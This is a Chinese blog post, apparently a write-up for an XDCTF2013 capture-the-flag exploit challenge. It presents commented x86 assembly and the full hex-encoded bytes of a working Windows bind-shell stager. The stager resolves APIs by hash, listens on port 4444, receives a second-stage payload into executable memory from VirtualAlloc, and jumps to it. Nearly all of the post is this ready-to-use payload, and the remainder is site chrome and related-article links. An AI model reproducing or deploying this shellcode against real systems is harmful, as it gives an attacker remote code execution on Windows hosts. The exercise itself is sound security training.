XDCTF2013线上赛exploit关(二)

最新推荐文章于 2015-07-17 17:32:13 发布
最新推荐文章于 2015-07-17 17:32:13 发布
阅读量1k 收藏 1
点赞数
分类专栏: Exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p0x1307/article/details/12361495
版权

   本题只要求写出一个shellcode,实现功能如下:

     1.  该shellcode能够在Win xp sp3 、Win7下测试运行;

     2.  该shellcode能够监听4444端口;

     3.  控制端可通过该shellcode的上传其他shellcode(A)到被控端,并执行A;

     4.  要求写出汇编代码及shellcode,需要有必要的注释;


实现的思路很简单,建立socket,绑定4444端口监听,收到连接后使用VirtualAlloc()函数申请一个可执行的buf,然后把buf作为参数调用recv()函数,接收完毕后jmp到buf执行。

WSAStartup() --> WSASocketA() --> bind() --> listen() --> accept() ↘

                                                                                              VirtualAlloc() --> recv() --> jmp buf

需要的函数上面的流程图里已经有了。直接贴代码吧,拿0day安全那本书里面的shellcode改的

		cld

		; 各API的hash值
		push 0xc7979076				; recv()
		push 0x01971eb1				; accept()
		push 0x4bd39f0c				; listen()
		push 0xdda71064				; bind()
		push 0xde78322d				; WSASocketA()
		push 0x80b46a3d				; WSAStartup()
		push 0x1ede5967				; VirtualAlloc()
		push 0x0c917432				; LoadLibraryA()
		mov esi, esp				; esi指向存放hash值的内存
		lea edi, [esi-0x20]			; edi指向存放API地址的内存

		; 获取kernel32.dll的基址
		xor edx, edx
		mov ebx, fs:[edx + 0x30]		; PEB地址
		mov ecx, [ebx + 0x0c]			; _PEB_LDR_DATA地址
		mov ecx, [ecx + 0x1c]			; 模块链表InInitialzationOrderModuleList的第一个节点
		mov ecx, [ecx]				; 第二个节点
		mov edx, [ecx + 0x18]			; 第二个节点dll的全名
		mov edx, [edx + 0x34]			; 第二个节点全名偏移0x34处
		cmp dl, 0x33				; xp下第二个节点为kernel32.dll
		je kernel32                             ; win7下为kernelBase.dll,因此要判断一下
		mov ecx, [ecx]
	kernel32:
		mov ebp, [ecx + 0x08]			; ebp = kernel32.dll基址

		; 抬高栈顶,防止后面调用函数时覆盖数据
		xor edx, edx
		mov dh, 0x03				; 抬高0x300
		sub esp, edx

		; 压入"ws2_32"
		mov dx, 0x3233				; edx的高8位为0,即字符串结尾的NULL
		push edx
		push 0x5f327377
		push esp

	find_lib_functions:
		lodsd					; 将hash值复制进eax,同时esi加1
		cmp eax, 0x80b46a3d			; 判断是否需要LoadLibraryA("ws2_32.dll")
		jne find_functions
		xchg eax, ebp				; 保存当前hash值
		call [edi-0x08]				; LoadLibraryA
		xchg eax, ebp				; 还原hash,同时将ebp更新为ws2_32.dll基址

		push edi				; edi指向存放第一个winsock函数地址的内存

	find_functions:
		pushad					; 保存寄存器
		mov eax, [ebp+0x3c]			; PE头
		mov ecx, [ebp+eax+0x78]			; 导出表偏移量
		add ecx, ebp				; 导出表实际地址
		mov ebx, [ecx+0x20]			; 函数名称列表相对于dll基址的偏移量
		add ebx, ebp				; 函数名称列表实际地址

		xor edi, edi				; 清零edi,它作为函数计数器

	next_function_loop:
		inc edi						
		mov esi, [ebx+edi*4]			; 当前函数名字的偏移量
		add esi, ebp				; 当前函数名字的实际地址
		cdq							

	hash_loop:
		movsx eax, byte ptr [esi]		; 取出当前函数名字的某个字符
		cmp al, ah				; 判断是否到名字结尾
		jz compare_hash				
		ror edx, 7				; 循环右移7位,加上新字符的值
		add edx, eax
		inc esi
		jmp hash_loop

	compare_hash:
		cmp edx, [esp+0x1c]			; 比较hash值(pushad时存放在栈中)
		jnz next_function_loop			; 不相等则跳转,取下一个函数

		mov ebx, [ecx+0x24]			
		add ebx, ebp				
		mov di, [ebx+2*edi]			
		mov ebx, [ecx+0x1c]			; 地址表偏移
		add ebx, ebp				; 地址表实际地址
		add ebp, [ebx+4*edi]			; 函数地址
		xchg eax, ebp				; 将函数地址存储到eax中
		pop edi					; pushad时,edi最后一个入栈
		stosd					; 将函数地址写如[edi],然后edi加1
		push edi
		popad					; 还原寄存器
		cmp eax, 0xc7979076			; 判断是否取得所有函数地址
		jne find_lib_functions

		pop esi					; 第一个winsock函数的地址,对应上面的push edi

		; 初始化winsock
		push esp				; WSADATA,使用栈空间
		push 0x02				; wVersionRequested
		lodsd						
		call eax				; WSAStartup()

		; 清零栈空间,当做NULL参数
		lea ecx, [eax + 0x30]			; sizeof(STARTUPINFO) = 0x44
		mov edi, esp
		rep stosd				; 清零栈空间

		; 创建socket
		inc eax
		push eax				; SOCK_STREAM
		inc eax				
		push eax				; AF_INET
		lodsd
		call eax				; WSASocketA()
		xchg ebp, eax				; 保存SOCKET描述符

		; bind()函数参数入栈
		mov eax, 0x5c11ff02			; 0x5c11 = 4444端口, 0x02 = AF_INET
		xor ah, ah				; 移除eax中的ff
		push eax				; 以此作为sockaddr结构体,同时也是namelen参数
		push esp				; sockaddr

		; 依次调用bind(), listen(), accept()
	call_loop:
		push ebp				; SOCKET描述符
		lodsd
		call eax				; 调用函数
		test eax, eax				; bind()和listen()返回0,accept()返回新的SOCKET描述符
		jz call_loop

		xchg eax, ebp				; 保存新的SOCKET描述符

		; 调用VirtualAlloc()函数申请可执行的内存空间
		xor edx, edx
		add dl, 0x40
		push edx				; flProtect = 0x40,读,写,执行
		xor edx, edx
		add dh, 0x10
		push edx				; flAlloction Type = 0x1000
		mov dh, 0x04
		push edx				; dwSize = 0x400,申请0x400字节
		xor edx, edx
		push edx				; lpAddress = NULL,由系统分配首地址
		call [esi-0x18]				; VirtualAlloc()

		xchg eax, ebp				; 执行完这一语句,eax = SOCKET描述符,ebp = 申请的内存首地址

		xor edx, edx			
		push edx				; flags = 0
		mov dh, 0x04
		push edx				; len = 0x400
		push ebp				; buf
		push eax				; SOCKET
		call [esi]				; recv()
		jmp ebp					; 接收shellcode后,跳转执行

shellcode:

"\xFC\x68\x76\x90\x97\xC7\x68\xB1\x1E\x97\x01\x68"
"\x0C\x9F\xD3\x4B\x68\x64\x10\xA7\xDD\x68\x2D\x32"
"\x78\xDE\x68\x3D\x6A\xB4\x80\x68\x67\x59\xDE\x1E"
"\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xE0\x33\xD2"
"\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09"
"\x8B\x51\x18\x8B\x52\x34\x80\xFA\x33\x74\x02\x8B"
"\x09\x8B\x69\x08\x33\xD2\xB6\x03\x2B\xE2\x66\xBA"
"\x33\x32\x52\x68\x77\x73\x32\x5F\x54\xAD\x3D\x3D"
"\x6A\xB4\x80\x75\x06\x95\xFF\x57\xF8\x95\x57\x60"
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20"
"\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F"
"\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46"
"\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03"
"\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C"
"\xBB\x95\x5F\xAB\x57\x61\x3D\x76\x90\x97\xC7\x75"
"\xA8\x5E\x54\x6A\x02\xAD\xFF\xD0\x8D\x48\x30\x8B"
"\xFC\xF3\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8"
"\x02\xFF\x11\x5C\x32\xE4\x50\x54\x55\xAD\xFF\xD0"
"\x85\xC0\x74\xF8\x95\x33\xD2\x80\xC2\x40\x52\x33"
"\xD2\x80\xC6\x10\x52\xB6\x04\x52\x33\xD2\x52\xFF"
"\x56\xE8\x95\x33\xD2\x52\xB6\x04\x52\x55\x50\xFF"
"\x16\xFF\xE5"


p0x1307
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛中,互联网选拔赛第场的线上CTF...
exploit编写教程(
06-14
### Exploit编写教程():栈溢出——跳至shellcode #### 一、引言 在上一篇教程中,我们介绍了栈溢出的基本概念及其利用方式。本篇文章将继续深入探讨如何有效地让shellcode得到执行。对于大多数利用场景而言,...
exploit:进制漏洞挖掘技术摘要
04-25
exploitSummary of binary vulnerability mining techniques该项目是于挖掘进制漏洞的一些技术和技巧,可以理解为它是一个教材,里面包含了一些常见漏洞的原理和攻击方式。由于本人水平有限,不能避免可能会在...
BungeeExploit_Exploit_minecraft源码_
10-02
对于服务器管理员,定期进行安全审计和监控日志至重要。一旦发现异常行为,应立即记录并分析,以防exploit的进一步扩散。同时,使用防火墙和入侵检测系统也是保护服务器安全的有效手段。 总的来说,BungeeExploit...
iis7.rar_Exploit
09-24
【标题】"iis7.rar_Exploit"指的是针对IIS7(Internet Information Services 7)的一个漏洞利用工具。IIS是微软公司推出的Web服务器软件,广泛用于企业级的网站托管。IIS7是该系列的第七个主要版本,发布于2007年,...
Windbg的Symbol路径配置
p0x1307的专栏
08-29 3002
用OD调试漏洞总是跑飞,开始学着用Windbg。被Symbol的路径问题折腾了半天,在网上也没找着合适的方法,不过还好最后折腾出来了。 首先是下载合适自己系统版本的Symbol安装文件,注意,一定要下适合自己系统的,XP SP2下SP3版本的就等着哭吧。 下载链接:http://msdn.microsoft.com/en-us/windows/hardware/gg463028.aspx 下
linux exec /bin/sh shellcode x86 and x86_64
p0x1307的专栏
07-17 1890
linux/x86/x64 shellcode:exec /bin/sh
Ubuntu下安装Metasploit
p0x1307的专栏
10-04 1751
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。 首先在Metesploit官网下载最新的安装包。下载地址:http://www.metasploit.com/download/ 下载之后记得比对校检码,如果校检码不符合,说明安装包在下载过程中损坏,需要重新下载。损坏的安
Adobe PDF LibTiff Integer Overflow CVE-2010-0188分析
p0x1307的专栏
08-30 1721
一,TIFF图像格式介绍 TIFF文件分为文件头IFH和IFD两部分。 IFH结构见下图: 共有8字节。其中 0-1 规定为“II”或“MM”,Intel/Mortorola类型的字节序列 2-3 TIFF版本号,为向下兼容,值为42 4-7 第一个IFD的偏移量 IFD结构见下图 IFD由连续存储的DE组成。 0-1 IFD中DE个数 2-13 第一个DE
XDCTF2013线上赛exploit(三)
p0x1307的专栏
10-07 1230
国际惯例,下载程序后先拖入IDA分析,看了半天也没看出个所以然。 于是直接发送超长数据,看程序会不会崩。 FTP服务器在接收完USER和PASS之后,会发送Welcome信息。直觉告诉我,这儿应该会崩,于是写个socket程序,发送长字符串,程序果然崩了。 然后用windbg载入,用kn命令看一下调用堆栈。尝试了几次后,找到了键函数sub_4013D0。 这个函数先是创建socket,然
CSAW 2013 Exploition Writeup
p0x1307的专栏
09-25 1225
Exploition 100 第一个很简单,给出了源码,如下: [snip] void handle(int newsock) { int backdoor = 0; char buffer[1016]; memset(buffer, 0, 1016); send(newsock, "Welcome to CSAW CTF.", 21, 0); recv(newsock, b
安全比赛中exploit方法小结
p0x1307的专栏
11-25 1216
这半年大大小小的各种安全比赛做了好多,总结一下各种比赛中exploit题的解题思路吧。 首先,将exploit题分成两个步骤: 发现溢出点利用溢出点 下面就从这两点出发,分别进行详细阐述。 发现溢出点 这个部分主要就是用两种方法: 直接拖进IDA里分析程序fuzzing 直接分析 比较简单的程序可以用这种方式。简答是指程序内部逻辑比较简单,直观表现就是程序文件比较小。一般来
XDCTF2013决赛FTPServer溢出分析
p0x1307的专栏
10-22 1039
这是个FTP服务器程序,点击打开本机就开启21端口,提供FTP服务了。 手动fuzzing后发现,当dir命令的路径参数为520字节时,就会刚好覆盖EIP。 抓包可以发现,使用dir命令时,实际发送的数据包中的命令是LIST,如下图
XDCTF2013线上赛exploit(一)
p0x1307的专栏
10-24 889
IDA反汇编exploit1.exe,在sub_40FA70里可以看到申请了一个0x10000字节的空间 var_10000= byte ptr -10000h 然后将其作为参数传入了scanf()函数 .text:0040FA9F                 lea     eax, [ebp+var_10000] .text:0040FAA5
XDCTF2013线上赛exploit(六)
p0x1307的专栏
10-08 754
该程序是一个内嵌的Web服务器,问题出现在处理HTTP报文Host字段时 处理过程调用了两个函数 .text:00401BFC push offset aHost ; "Host:" .text:00401C01 mov [esi+624h], eax .text:00401C07
蒙牛智能化改造解决方案.docx
08-17
蒙牛智能化改造解决方案.docx
java基于ssm+jsp BS架构的学生档案管理系统源码 带毕业论文
08-17
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;JSP技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
机械行业数字化生产供应链产品解决方案.pdf
最新发布
08-17
机械行业数字化生产供应链产品解决方案.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值